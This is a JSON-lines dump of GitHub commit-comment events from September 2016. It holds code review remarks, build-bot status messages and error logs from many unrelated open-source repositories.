{"id":"4573847601","type":"CommitCommentEvent","actor":{"login":"alexfelipe"},"repo":{"name":"marcelooliveira/alura-linq"},"payload":{"comment":{"id":19053584,"position":42,"line":60,"path":"AluraLinq.Console/Problemas/18. obter o valor da compra mediana dos totais de notas fiscais/Problema18.cs","commit_id":"4f95a51bc18070fdf635eea6f4baef0c3f5c1953","created_at":"2016-09-16T12:49:19Z","updated_at":"2016-09-16T12:49:19Z","body":"A princípio fiquei com dúvida sobre a implementação, mas pelas simulações na unha (papel e lápis) eu vi que contempla. Em outras palavras, nessa implementação sugiro bastante atenção na hora de explicar, conversei com o Lucas (um dos instrutores de C#) e ele falou que no curso o Skip não é mencionando, portanto, precisará explicar como ele funciona.\r\n\r\nAlém disso, a versão da mediana ficou bem otimizada e enxuta, isso é bom, porém, pra explicar as vezes pode ser complicado, pois o aluno não consegue enxergar logo de cara o que cada um dos skips estão fazendo. A minha sugestão seria, faça uma simulação gráfica para cada um dos skips quando implementar, dessa forma, mesmo que ele não entenda rapidamente em código, saberá o que cada um dos skips fazem. Pode ser, por exemplo, em um slide com tabelas que contemplam conjuntos de números impáres para e pares, para mostrar que funciona para todos os casos."}},"created_at":"2016-09-16T12:49:19Z"}
{"id":"4573849380","type":"CommitCommentEvent","actor":{"login":"yan12125"},"repo":{"name":"rg3/youtube-dl"},"payload":{"comment":{"id":19053589,"position":null,"line":null,"path":null,"commit_id":"95be29e1c6b7a06ac444d5142582ebece79698ff","created_at":"2016-09-16T12:49:42Z","updated_at":"2016-09-16T12:49:42Z","body":"For future references: this API key is extracted from browser requests."}},"created_at":"2016-09-16T12:49:42Z"}
{"id":"4573851954","type":"CommitCommentEvent","actor":{"login":"parski"},"repo":{"name":"facebook/ios-snapshot-test-case"},"payload":{"comment":{"id":19053593,"position":null,"line":null,"path":null,"commit_id":"b48e77e3397298baf1532a8e4f418197df2843c3","created_at":"2016-09-16T12:50:19Z","updated_at":"2016-09-16T12:50:19Z","body":"Neither are we. [Issue](https://github.com/facebook/ios-snapshot-test-case/issues/190)."}},"created_at":"2016-09-16T12:50:19Z"}
{"id":"4573854434","type":"CommitCommentEvent","actor":{"login":"kbss"},"repo":{"name":"bogdanlupashko/betMachine"},"payload":{"comment":{"id":19053600,"position":28,"line":39,"path":"src/com/varteq/service/ProcessServiceImpl.java","commit_id":"6d45a3dff9684f6197e01e77f02566b6acd7cfdd","created_at":"2016-09-16T12:50:52Z","updated_at":"2016-09-16T12:50:52Z","body":"Extract strings to constants\r\n"}},"created_at":"2016-09-16T12:50:52Z"}
{"id":"4573860034","type":"CommitCommentEvent","actor":{"login":"lorenzhs"},"repo":{"name":"bingmann/thrill"},"payload":{"comment":{"id":19053610,"position":2,"line":2,"path":"thrill/common/zip_stream.cpp","commit_id":"f995edf7febb066ebdb8c2c9324becb97478acca","created_at":"2016-09-16T12:51:51Z","updated_at":"2016-09-16T12:51:51Z","body":"I wonder in which project this file originated."}},"created_at":"2016-09-16T12:51:51Z"}
{"id":"4573861131","type":"CommitCommentEvent","actor":{"login":"yeluri"},"repo":{"name":"yeluri/PersonalRepo"},"payload":{"comment":{"id":19053611,"position":null,"line":null,"path":null,"commit_id":"9008c3b57b9ed86d963dc10e488003b5d08c2965","created_at":"2016-09-16T12:52:07Z","updated_at":"2016-09-16T12:52:07Z","body":"Thx"}},"created_at":"2016-09-16T12:52:07Z"}
{"id":"4573864895","type":"CommitCommentEvent","actor":{"login":"smipi1"},"repo":{"name":"warmcat/libwebsockets"},"payload":{"comment":{"id":19053622,"position":7,"line":873,"path":"lib/client.c","commit_id":"499954a09646e2c7140957ec0244fd26418077b2","created_at":"2016-09-16T12:52:56Z","updated_at":"2016-09-16T12:52:56Z","body":"Thanks! Nice to know that I don't have to submit a new ticket for this!\r\nI'll be switching to v1.7.9. Once the pressure is off, we'll try to figure out why we are getting a sigsegv when switching to v2.x."}},"created_at":"2016-09-16T12:52:56Z"}
{"id":"4573865575","type":"CommitCommentEvent","actor":{"login":"satya164"},"repo":{"name":"facebook/react-native"},"payload":{"comment":{"id":19053624,"position":null,"line":null,"path":null,"commit_id":"eb3360b02ab82d20bc3c3f38f543b0d742598346","created_at":"2016-09-16T12:53:05Z","updated_at":"2016-09-16T12:53:05Z","body":"Probably `getNode` is a better term since it's not returning a `component`?"}},"created_at":"2016-09-16T12:53:05Z"}
{"id":"4573869406","type":"CommitCommentEvent","actor":{"login":"AgileFreaksBuildServer"},"repo":{"name":"Agilefreaks/todo"},"payload":{"comment":{"id":19053634,"position":null,"line":null,"path":null,"commit_id":"51705078e6f1f2f13348aeeffa664843c2ecd7aa","created_at":"2016-09-16T12:53:55Z","updated_at":"2016-09-16T12:53:55Z","body":"TeamCity Todo :: Build [Build 112](http://109.103.226.38:8512/viewLog.html?buildId=38507&buildTypeId=Todo_Build) is now running\n"}},"created_at":"2016-09-16T12:53:55Z"}
{"id":"4573870302","type":"CommitCommentEvent","actor":{"login":"AgileFreaksBuildServer"},"repo":{"name":"Agilefreaks/todo"},"payload":{"comment":{"id":19053636,"position":null,"line":null,"path":null,"commit_id":"51705078e6f1f2f13348aeeffa664843c2ecd7aa","created_at":"2016-09-16T12:54:09Z","updated_at":"2016-09-16T12:54:09Z","body":"TeamCity Todo :: Build [Build 112](http://109.103.226.38:8512/viewLog.html?buildId=38507&buildTypeId=Todo_Build) outcome was **SUCCESS**\nSummary: Tests passed: 15 Build time: 00:00:07"}},"created_at":"2016-09-16T12:54:09Z"}
{"id":"4573873997","type":"CommitCommentEvent","actor":{"login":"ssbn-412-42"},"repo":{"name":"ssbn-412-42/Leaning"},"payload":{"comment":{"id":19053645,"position":null,"line":null,"path":null,"commit_id":"866dcbea80edcbfff8c0b0726ab9c0db38fe0081","created_at":"2016-09-16T12:54:57Z","updated_at":"2016-09-16T12:54:57Z","body":"GC 回收\r\n太乱了，看不懂，先记下来"}},"created_at":"2016-09-16T12:54:57Z"}
{"id":"4573875199","type":"CommitCommentEvent","actor":{"login":"ndavalos"},"repo":{"name":"EpochModTeam/DayZ-Epoch"},"payload":{"comment":{"id":19053648,"position":null,"line":null,"path":null,"commit_id":"e8e5d24e80f77268c8befa38680ccd9de6c03452","created_at":"2016-09-16T12:55:14Z","updated_at":"2016-09-16T12:55:14Z","body":"I had this happen on Napf logging out standing up at the airfield on the western side of the map just once yesterday. Popped me out of the ground and standing normally after a couple seconds though."}},"created_at":"2016-09-16T12:55:14Z"}
{"id":"4573878086","type":"CommitCommentEvent","actor":{"login":"kpawelski"},"repo":{"name":"snipe/snipe-it"},"payload":{"comment":{"id":19053655,"position":null,"line":null,"path":null,"commit_id":"04898c49b245f9db4417cee414c23073e5b2e395","created_at":"2016-09-16T12:55:49Z","updated_at":"2016-09-16T12:55:49Z","body":"yeap, that's correct. But do we try to keep standards eg. in var names and improve it? \r\nSo far... most variables are written with dash (in multiple word var)."}},"created_at":"2016-09-16T12:55:49Z"}
{"id":"4573878151","type":"CommitCommentEvent","actor":{"login":"Lucrecious"},"repo":{"name":"SolarLune/bdx"},"payload":{"comment":{"id":19053656,"position":31,"line":31,"path":"extern/fontwriter/src/com/solarlune/fontwriter/DesktopLauncher.java","commit_id":"feec72706f463cc3da7262f013ef75fef448f537","created_at":"2016-09-16T12:55:50Z","updated_at":"2016-09-16T12:55:50Z","body":"Wouldn't this be better done on the init of bdx.java (or somewhere, more \"global\")? If I were on an Android SDK, changed up my fonts and launched my android app, there wouldn't be font texture generation, right?\r\n\r\nAlso, it seems like you're generating font textures every time the desktop app is launched regardless of whether or not they exist already. I thought the textures only needed to be generated when there was a change/creation of a font. Is this necessary?"}},"created_at":"2016-09-16T12:55:50Z"}
{"id":"4573878489","type":"CommitCommentEvent","actor":{"login":"mihailik"},"repo":{"name":"jeffpar/pcjs"},"payload":{"comment":{"id":19053660,"position":53,"line":53,"path":"modules/shared/lib/keys.js","commit_id":"5398064ec4706dee497f9c3ade7483566ffce011","created_at":"2016-09-16T12:55:55Z","updated_at":"2016-09-16T12:55:55Z","body":"can unquote `$` too"}},"created_at":"2016-09-16T12:55:55Z"}
{"id":"4573888408","type":"CommitCommentEvent","actor":{"login":"marcopeg"},"repo":{"name":"marcopeg/test"},"payload":{"comment":{"id":19053690,"position":3,"line":4,"path":"README.md","commit_id":"337513201a62168eb3ec48241c43ce55809ff189","created_at":"2016-09-16T12:58:05Z","updated_at":"2016-09-16T12:58:05Z","body":"test message"}},"created_at":"2016-09-16T12:58:05Z"}
{"id":"4573890930","type":"CommitCommentEvent","actor":{"login":"marcopeg"},"repo":{"name":"marcopeg/test"},"payload":{"comment":{"id":19053696,"position":3,"line":4,"path":"README.md","commit_id":"337513201a62168eb3ec48241c43ce55809ff189","created_at":"2016-09-16T12:58:35Z","updated_at":"2016-09-16T12:58:35Z","body":"ok"}},"created_at":"2016-09-16T12:58:35Z"}
{"id":"4573892467","type":"CommitCommentEvent","actor":{"login":"LastAvenger"},"repo":{"name":"archlinuxcn/lilac"},"payload":{"comment":{"id":19053699,"position":null,"line":null,"path":null,"commit_id":"c990c5d67e10939b8e85b95e46ea00b7227c5e40","created_at":"2016-09-16T12:58:55Z","updated_at":"2016-09-16T12:58:55Z","body":"在本地 `git update-index --assume-unchanged config.ini` 会不会更好些？\r\n如果要新增配置项的话有要从 .gitignore 里面把 config.ini 去掉了。"}},"created_at":"2016-09-16T12:58:55Z"}
{"id":"4573895707","type":"CommitCommentEvent","actor":{"login":"jingai"},"repo":{"name":"jingai/skin.metropolis"},"payload":{"comment":{"id":19053708,"position":null,"line":null,"path":null,"commit_id":"864a5d3423c9aa7b9698e7c20245e88dcbd41c34","created_at":"2016-09-16T12:59:36Z","updated_at":"2016-09-16T12:59:36Z","body":"@MacGyverr , Are you seeing a problem here?"}},"created_at":"2016-09-16T12:59:36Z"}
{"id":"4573896342","type":"CommitCommentEvent","actor":{"login":"clebertsuconic"},"repo":{"name":"mtaylor/activemq-artemis"},"payload":{"comment":{"id":19053709,"position":23,"line":317,"path":"artemis-server/src/main/java/org/apache/activemq/artemis/core/server/impl/ActiveMQServerImpl.java","commit_id":"cf18cf40c1c8a42db0cff01fd723fbd4923d8b0b","created_at":"2016-09-16T12:59:44Z","updated_at":"2016-09-16T12:59:44Z","body":"Concurrent?"}},"created_at":"2016-09-16T12:59:44Z"}
{"id":"4573900229","type":"CommitCommentEvent","actor":{"login":"XinyuHou"},"repo":{"name":"symless/synergy"},"payload":{"comment":{"id":19053717,"position":7,"line":367,"path":"src/lib/client/Client.cpp","commit_id":"59d2c790d39e31ab04ebb1f8862ffd4201982743","created_at":"2016-09-16T13:00:33Z","updated_at":"2016-09-16T13:00:33Z","body":"On Linux, it says no function called cbegin."}},"created_at":"2016-09-16T13:00:33Z"}
{"id":"4573902404","type":"CommitCommentEvent","actor":{"login":"guyd"},"repo":{"name":"mldbai/mldb"},"payload":{"comment":{"id":19053725,"position":5,"line":7,"path":"tensorflow/doc/Tensorflow.md","commit_id":"8d42337c1de9dd9f1823f2d7b14959d2fe497c1a","created_at":"2016-09-16T13:01:00Z","updated_at":"2016-09-16T13:01:00Z","body":"implicitely -> implicitly\r\n"}},"created_at":"2016-09-16T13:01:00Z"}
{"id":"4573904658","type":"CommitCommentEvent","actor":{"login":"guyd"},"repo":{"name":"mldbai/mldb"},"payload":{"comment":{"id":19053730,"position":7,"line":9,"path":"tensorflow/doc/Tensorflow.md","commit_id":"8d42337c1de9dd9f1823f2d7b14959d2fe497c1a","created_at":"2016-09-16T13:01:28Z","updated_at":"2016-09-16T13:01:28Z","body":"type -> types?"}},"created_at":"2016-09-16T13:01:28Z"}
{"id":"4573906665","type":"CommitCommentEvent","actor":{"login":"clebertsuconic"},"repo":{"name":"mtaylor/activemq-artemis"},"payload":{"comment":{"id":19053736,"position":23,"line":317,"path":"artemis-server/src/main/java/org/apache/activemq/artemis/core/server/impl/ActiveMQServerImpl.java","commit_id":"cf18cf40c1c8a42db0cff01fd723fbd4923d8b0b","created_at":"2016-09-16T13:01:51Z","updated_at":"2016-09-16T13:01:51Z","body":"Use ConcurrentHashSet from org.apache.activemq.artemis.utils\r\n"}},"created_at":"2016-09-16T13:01:51Z"}
{"id":"4573911801","type":"CommitCommentEvent","actor":{"login":"sophokle"},"repo":{"name":"dashesy/amiigo-link"},"payload":{"comment":{"id":19053741,"position":null,"line":null,"path":null,"commit_id":"9c2cf5a2796018ee408e00c14fd16fb4e46ba31f","created_at":"2016-09-16T13:02:42Z","updated_at":"2016-09-16T13:02:42Z","body":"hello dashesy,\r\nls_interval, is it the interval between two sessions or the interval between two measurements in the same session?\r\nls_duration, is it the session duration?\r\nmoreover, which unit of measurement are those numbers?\r\naccel_rate, is it the interval between two measurements? and which unit of measurement is it?\r\nThanks for your time"}},"created_at":"2016-09-16T13:02:42Z"}
{"id":"4573919914","type":"CommitCommentEvent","actor":{"login":"aadithpm"},"repo":{"name":"hauckwill/linconnect-server"},"payload":{"comment":{"id":19053765,"position":null,"line":null,"path":null,"commit_id":"140d598c3279107d31066c6c4df9daddb1d624e7","created_at":"2016-09-16T13:04:26Z","updated_at":"2016-09-16T13:04:26Z","body":"Add extra bash commands for the case that install.sh is already present in the directory, which might cause problems with altering permissions."}},"created_at":"2016-09-16T13:04:26Z"}
{"id":"4573920377","type":"CommitCommentEvent","actor":{"login":"keomabrun"},"repo":{"name":"realms-team/sol"},"payload":{"comment":{"id":19053767,"position":null,"line":null,"path":null,"commit_id":"430eaf8f622ccb1605c73e684e077ad1e78d7d55","created_at":"2016-09-16T13:04:32Z","updated_at":"2016-09-16T13:04:32Z","body":"The structure was change because:\r\n- uint32 was to big for temp and rh\r\n- we are now using an id field to identify the node. We don't want to change the node's firmware when changing the sensor height. This value can then be written at the server side."}},"created_at":"2016-09-16T13:04:32Z"}
{"id":"4573933740","type":"CommitCommentEvent","actor":{"login":"tivisse"},"repo":{"name":"odoo/odoo"},"payload":{"comment":{"id":19053809,"position":null,"line":null,"path":null,"commit_id":"e4c8bed5b06e2d19c1c420309cef0dcf677c776f","created_at":"2016-09-16T13:07:18Z","updated_at":"2016-09-16T13:07:18Z","body":"Yep"}},"created_at":"2016-09-16T13:07:18Z"}
{"id":"4573936720","type":"CommitCommentEvent","actor":{"login":"therhb"},"repo":{"name":"therhb/rekrutacja_egnyte"},"payload":{"comment":{"id":19053813,"position":21,"line":21,"path":"checker.py","commit_id":"cae9156fe5af7c73abf2281507b9f91837160946","created_at":"2016-09-16T13:07:56Z","updated_at":"2016-09-16T13:07:56Z","body":"Yes, it would allow me to check the process with lesser steps what would result with faster and less complex process. Thanks for the feedback, I'm going to correct code where you have sugggested it, and upload new version."}},"created_at":"2016-09-16T13:07:56Z"}
{"id":"4573937354","type":"CommitCommentEvent","actor":{"login":"knownasilya"},"repo":{"name":"denali-js/denali"},"payload":{"comment":{"id":19053815,"position":null,"line":null,"path":null,"commit_id":"ffd1657dbb789ed663a6679fb1067a79bb19e4d6","created_at":"2016-09-16T13:08:05Z","updated_at":"2016-09-16T13:08:05Z","body":"Changed in b4d1fb8"}},"created_at":"2016-09-16T13:08:05Z"}
{"id":"4573938697","type":"CommitCommentEvent","actor":{"login":"slambert"},"repo":{"name":"jamiew/capitalismworksfor.me"},"payload":{"comment":{"id":19053821,"position":null,"line":null,"path":null,"commit_id":"7cdfa4f54053773dc9b1e5d1b3bab64fcfe3cdd2","created_at":"2016-09-16T13:08:21Z","updated_at":"2016-09-16T13:08:21Z","body":"Using homebrew and trying to get it all up and running. Getting all the dependent gems installed and configured in the gemfile and stuff has been tricky. I can’t get foreman to start. The error messages start like this:\n\n09:01:06 web.1  | started with pid 24292\n09:01:06 web.1  | I, [2016-09-16T09:01:06.451630 #24292]  INFO -- : Refreshing Gem list\n09:01:06 web.1  | /usr/local/lib/ruby/gems/2.3.0/gems/activesupport-4.0.0/lib/active_support/values/time_zone.rb:282: warning: circular argument reference - now\n09:01:07 web.1  | I, [2016-09-16T09:01:07.064508 #24292]  INFO -- : listening on addr=0.0.0.0:5000 fd=8\n09:01:07 web.1  | E, [2016-09-16T09:01:07.203541 #24292] ERROR -- : could not connect to server: No such file or directory\n09:01:07 web.1  |      \tIs the server running locally and accepting\n09:01:07 web.1  |      \tconnections on Unix domain socket \"/tmp/.s.PGSQL.5432\"?\n09:01:07 web.1  |  (PG::ConnectionBad)\n\nI used homebrew to install postgre. Updated all my gems. Changed the Gemfile so some of the versions matched for Ruby and kgio and stuff (assuming that was the correct thing to do).\n\nAny ideas?\n\nThe Moscow show opens in a couple hours, if we can get it reset, that would be awesome. I can tweak the look later.\n"}},"created_at":"2016-09-16T13:08:21Z"}
{"id":"4573939313","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19053822,"position":null,"line":null,"path":null,"commit_id":"6e7b2b73ccb2f11723abf94b2ee3d2f74b84bd7e","created_at":"2016-09-16T13:08:29Z","updated_at":"2016-09-16T13:08:29Z","body":"5039_stratified_tank_speedup (nmerket) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-6e7b2b73ccb2f11723abf94b2ee3d2f74b84bd7e-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-16T13:08:29Z"}
{"id":"4573944609","type":"CommitCommentEvent","actor":{"login":"creamidea"},"repo":{"name":"creamidea/redux-in-chinese"},"payload":{"comment":{"id":19053837,"position":null,"line":null,"path":null,"commit_id":"b7a672ba3bd20c2ebd046841188d15d7fb6f896b","created_at":"2016-09-16T13:09:36Z","updated_at":"2016-09-16T13:09:36Z","body":"将可信任数据源那句话重新翻译了一下。精简句子成分。\r\n**fallback URL** 依然延续 **后备 URL** 的翻译，只是增加了 **fallback** 英文注释。"}},"created_at":"2016-09-16T13:09:36Z"}
{"id":"4573945601","type":"CommitCommentEvent","actor":{"login":"vwaurich"},"repo":{"name":"vwaurich/OMEdit"},"payload":{"comment":{"id":19053839,"position":7,"line":209,"path":"OMEdit/OMEditGUI/Animation/AnimationWindow.cpp","commit_id":"1e1497aee9e2b217559b15d9de2c0b2c5cb16c70","created_at":"2016-09-16T13:09:49Z","updated_at":"2016-09-16T13:09:49Z","body":"I wanted to use the directory of the result file that is generated if I press simulate. When no directory is specified in here, I have to move to this directory. Anyway, I will revert it."}},"created_at":"2016-09-16T13:09:49Z"}
{"id":"4573954347","type":"CommitCommentEvent","actor":{"login":"ct16k"},"repo":{"name":"voxpupuli/puppet-php"},"payload":{"comment":{"id":19053860,"position":null,"line":null,"path":null,"commit_id":"6d4534a1d2738e16bb93800ed547a937336b6367","created_at":"2016-09-16T13:11:34Z","updated_at":"2016-09-16T13:11:34Z","body":"I've also encountered the same errors on CentOS 6 (v1.8.7):\r\n```\r\nError: Could not autoload puppet/provider/package/pecl: /var/lib/puppet/lib/puppet/provider/package/pecl.rb:4: syntax error, unexpected ':', expecting $end\r\n...ackage).provide :pecl, parent: Puppet::Provider::Package do\r\n                              ^\r\nError: Could not autoload puppet/type/package: Could not autoload puppet/provider/package/pecl: /var/lib/puppet/lib/puppet/provider/package/pecl.rb:4: syntax error, unexpected ':', expecting $end\r\n...ackage).provide :pecl, parent: Puppet::Provider::Package do\r\n                              ^\r\nError: Could not retrieve catalog from remote server: Could not intern from text/pson: Could not autoload puppet/type/package: Could not autoload puppet/provider/package/pecl: /var/lib/puppet/lib/puppet/provider/package/pecl.rb:4: syntax error, unexpected ':', expecting $end\r\n...ackage).provide :pecl, parent: Puppet::Provider::Package do\r\n                              ^\r\nWarning: Not using cache on failed catalog\r\nError: Could not retrieve catalog; skipping run\r\n```"}},"created_at":"2016-09-16T13:11:34Z"}
{"id":"4573955339","type":"CommitCommentEvent","actor":{"login":"bubobot"},"repo":{"name":"bubobox/parse-js"},"payload":{"comment":{"id":19053865,"position":null,"line":null,"path":null,"commit_id":"84c2960a29845e92568ad34ca0894df34693fd26","created_at":"2016-09-16T13:11:47Z","updated_at":"2016-09-16T13:11:47Z","body":"[Code coverage](https://110-47334959-gh.circle-artifacts.com/0//home/ubuntu/parse-js/coverage/lcov-report/index.html) is currently at **100%**"}},"created_at":"2016-09-16T13:11:47Z"}
{"id":"4573956326","type":"CommitCommentEvent","actor":{"login":"globin"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":19053868,"position":null,"line":null,"path":null,"commit_id":"e43a15720d62f6640d21ed49c12a3b76a563e99e","created_at":"2016-09-16T13:11:59Z","updated_at":"2016-09-16T13:11:59Z","body":"0201869"}},"created_at":"2016-09-16T13:11:59Z"}
{"id":"4573956946","type":"CommitCommentEvent","actor":{"login":"zacharyacutey"},"repo":{"name":"JoinRajuncraftNow/Projects"},"payload":{"comment":{"id":19053873,"position":null,"line":null,"path":null,"commit_id":"959128179ece6069beb1b43abf24a0961e6d1896","created_at":"2016-09-16T13:12:07Z","updated_at":"2016-09-16T13:12:07Z","body":"Do you know HTML, CSS, and JS?"}},"created_at":"2016-09-16T13:12:07Z"}
{"id":"4573958539","type":"CommitCommentEvent","actor":{"login":"minterciso"},"repo":{"name":"mscherer/ansible-modules-core"},"payload":{"comment":{"id":19053877,"position":null,"line":null,"path":null,"commit_id":"9b00f15cb939a7c96761d762525586fcf3e5ef5f","created_at":"2016-09-16T13:12:26Z","updated_at":"2016-09-16T13:12:26Z","body":"Instead of checking if it was passed the fstab argument, wouldn't it be bether to check for the mount version on the remote system?"}},"created_at":"2016-09-16T13:12:26Z"}
{"id":"4573959675","type":"CommitCommentEvent","actor":{"login":"jingai"},"repo":{"name":"MacGyverr/skin.metropolis"},"payload":{"comment":{"id":19053879,"position":null,"line":null,"path":null,"commit_id":"a96eebb43d5efd87f872e12848ab3bb08f34eaee","created_at":"2016-09-16T13:12:39Z","updated_at":"2016-09-16T13:12:39Z","body":"It is still 'ghosting' here with this patch: https://dl.dropboxusercontent.com/u/8967144/livetv_ghosting.png"}},"created_at":"2016-09-16T13:12:39Z"}
{"id":"4573961424","type":"CommitCommentEvent","actor":{"login":"WikiaJenkins"},"repo":{"name":"Wikia/design-system"},"payload":{"comment":{"id":19053883,"position":null,"line":null,"path":null,"commit_id":"e87d10b7ba78492b36b6a3ea2f460cda5b771fe0","created_at":"2016-09-16T13:13:01Z","updated_at":"2016-09-16T13:13:01Z","body":"Visual Regression Testing found a difference between new version and the baseline.\nCheck the diffs [here](http://jenkins.wikia-prod:8080/job/design-system-reference-page-pr-check/489/).\nAccept the new baseline [here](http://jenkins.wikia-prod:8080/job/design-system-reference-page-update-baseline/parambuild?branch=XW-2018)."}},"created_at":"2016-09-16T13:13:01Z"}
{"id":"4573964710","type":"CommitCommentEvent","actor":{"login":"ITASAPI"},"repo":{"name":"ITASAPI/ITASAPI-v2.7"},"payload":{"comment":{"id":19053893,"position":null,"line":null,"path":null,"commit_id":"ca2e904fcc3c487b71010012efb5ea01c9a79807","created_at":"2016-09-16T13:13:41Z","updated_at":"2016-09-16T13:13:41Z","body":"__API Description file syntax error on line 3179__: base type 'array MasterDataTradingEntityId' is not defined in the document (Autogenerated message from apiary.io)"}},"created_at":"2016-09-16T13:13:41Z"}
{"id":"4573965173","type":"CommitCommentEvent","actor":{"login":"Lineflyer"},"repo":{"name":"cgeo/cgeo"},"payload":{"comment":{"id":19053897,"position":null,"line":null,"path":null,"commit_id":"61fbe4e3ccff5becc20c505a45aaf46a5d19dc82","created_at":"2016-09-16T13:13:47Z","updated_at":"2016-09-16T13:13:47Z","body":"I like the ideas of @SammysHP to include it  in the sys info if feasible."}},"created_at":"2016-09-16T13:13:47Z"}
{"id":"4573967400","type":"CommitCommentEvent","actor":{"login":"mark0263"},"repo":{"name":"glFusion/glfusion"},"payload":{"comment":{"id":19053904,"position":null,"line":null,"path":null,"commit_id":"422c16e0fdf30e9d7368df8fe61272b747d386a9","created_at":"2016-09-16T13:14:15Z","updated_at":"2016-09-16T13:14:15Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;TQ8MGYYP&#x2F;36-headlines-panel-template-missing-closing-div\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Headlines Panel template missing closing div</a>"}},"created_at":"2016-09-16T13:14:15Z"}
{"id":"4573968236","type":"CommitCommentEvent","actor":{"login":"bubobot"},"repo":{"name":"bubobox/parse-js"},"payload":{"comment":{"id":19053907,"position":null,"line":null,"path":null,"commit_id":"720efb4ef855d3f1289a711812a6cc3fd700f268","created_at":"2016-09-16T13:14:24Z","updated_at":"2016-09-16T13:14:24Z","body":"[Code coverage](https://111-47334959-gh.circle-artifacts.com/0//home/ubuntu/parse-js/coverage/lcov-report/index.html) is currently at **99.5%**"}},"created_at":"2016-09-16T13:14:24Z"}
{"id":"4573968637","type":"CommitCommentEvent","actor":{"login":"sunilkumarchandra"},"repo":{"name":"sunilkumarchandra/sunil"},"payload":{"comment":{"id":19053908,"position":null,"line":null,"path":null,"commit_id":"0f943300a611390d37494a0a63503f983755f805","created_at":"2016-09-16T13:14:30Z","updated_at":"2016-09-16T13:14:30Z","body":"jdfmvfnv"}},"created_at":"2016-09-16T13:14:30Z"}
{"id":"4573969450","type":"CommitCommentEvent","actor":{"login":"sunilkumarchandra"},"repo":{"name":"sunilkumarchandra/sunil"},"payload":{"comment":{"id":19053913,"position":null,"line":null,"path":null,"commit_id":"0f943300a611390d37494a0a63503f983755f805","created_at":"2016-09-16T13:14:39Z","updated_at":"2016-09-16T13:14:39Z","body":"next"}},"created_at":"2016-09-16T13:14:39Z"}
{"id":"4573969720","type":"CommitCommentEvent","actor":{"login":"sthalik"},"repo":{"name":"opentrack/opentrack"},"payload":{"comment":{"id":19053914,"position":null,"line":null,"path":null,"commit_id":"dec625e51878c9167100837086f82fb0f78b0189","created_at":"2016-09-16T13:14:42Z","updated_at":"2016-09-16T13:14:42Z","body":"My guess is that the OLE function to show the property pages expects more `IUnknown` stuff than IBaseFilter` of the capture."}},"created_at":"2016-09-16T13:14:42Z"}
{"id":"4573969827","type":"CommitCommentEvent","actor":{"login":"mark0263"},"repo":{"name":"glFusion/glfusion"},"payload":{"comment":{"id":19053915,"position":null,"line":null,"path":null,"commit_id":"6bf1cb7e22793934398fcae19ae6a53e04ee3e7a","created_at":"2016-09-16T13:14:44Z","updated_at":"2016-09-16T13:14:44Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;bNq8qlMX&#x2F;35-story-instance-caching\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Story Instance Caching</a>"}},"created_at":"2016-09-16T13:14:44Z"}
{"id":"4573970534","type":"CommitCommentEvent","actor":{"login":"cristiklein"},"repo":{"name":"abelpc/httpmon"},"payload":{"comment":{"id":19053917,"position":14,"line":187,"path":"httpmon.cc","commit_id":"51eb4be633dcb07e36d3d6ed232296892e047b93","created_at":"2016-09-16T13:14:53Z","updated_at":"2016-09-16T13:14:53Z","body":"I would write `id % control.url.size()`. This way you don't need to worry that the user has given the same number of URLs as concurrency. Also, the user could only give two URLs and a concurrency of 100, and every even thread would use `url[0]`, while every odd would use `url[1]`. Neat feature! :smile: "}},"created_at":"2016-09-16T13:14:53Z"}
{"id":"4573971349","type":"CommitCommentEvent","actor":{"login":"cristiklein"},"repo":{"name":"abelpc/httpmon"},"payload":{"comment":{"id":19053921,"position":23,"line":259,"path":"httpmon.cc","commit_id":"51eb4be633dcb07e36d3d6ed232296892e047b93","created_at":"2016-09-16T13:15:04Z","updated_at":"2016-09-16T13:15:04Z","body":"Same as above."}},"created_at":"2016-09-16T13:15:04Z"}
{"id":"4573971426","type":"CommitCommentEvent","actor":{"login":"merik444"},"repo":{"name":"Thrax989/Project-Phoenix"},"payload":{"comment":{"id":19053922,"position":null,"line":null,"path":null,"commit_id":"a3eaa46db038ed929d36810bd1789f782194a17b","created_at":"2016-09-16T13:15:05Z","updated_at":"2016-09-16T13:15:05Z","body":"Works with no problems.\r\n\r\n[url=https://postimg.org/image/nozaicap9/][img]https://s14.postimg.org/nozaicap9/screen_Shot0024.jpg[/img][/url]\r\n\r\n[url=https://postimg.org/image/48ekvtfl9/][img]https://s14.postimg.org/48ekvtfl9/screen_Shot0025.jpg[/img][/url]"}},"created_at":"2016-09-16T13:15:05Z"}
{"id":"4573971849","type":"CommitCommentEvent","actor":{"login":"vjarysta"},"repo":{"name":"meteor/meteor"},"payload":{"comment":{"id":19053924,"position":null,"line":null,"path":null,"commit_id":"f475e379ab9beb6db73a8091389309bdafc16c47","created_at":"2016-09-16T13:15:10Z","updated_at":"2016-09-16T13:15:10Z","body":"Awesome commit !"}},"created_at":"2016-09-16T13:15:10Z"}
{"id":"4573973040","type":"CommitCommentEvent","actor":{"login":"premaca"},"repo":{"name":"premaca/android_device_wingtech_wt88047"},"payload":{"comment":{"id":19053929,"position":null,"line":null,"path":null,"commit_id":"da1392d2052e04e54915ca992dd9cff45ed591e5","created_at":"2016-09-16T13:15:25Z","updated_at":"2016-09-16T13:15:25Z","body":"Build is cooked long time back, but there are few issues, RIL/GPS/CameraVideo. Need to work on those."}},"created_at":"2016-09-16T13:15:25Z"}
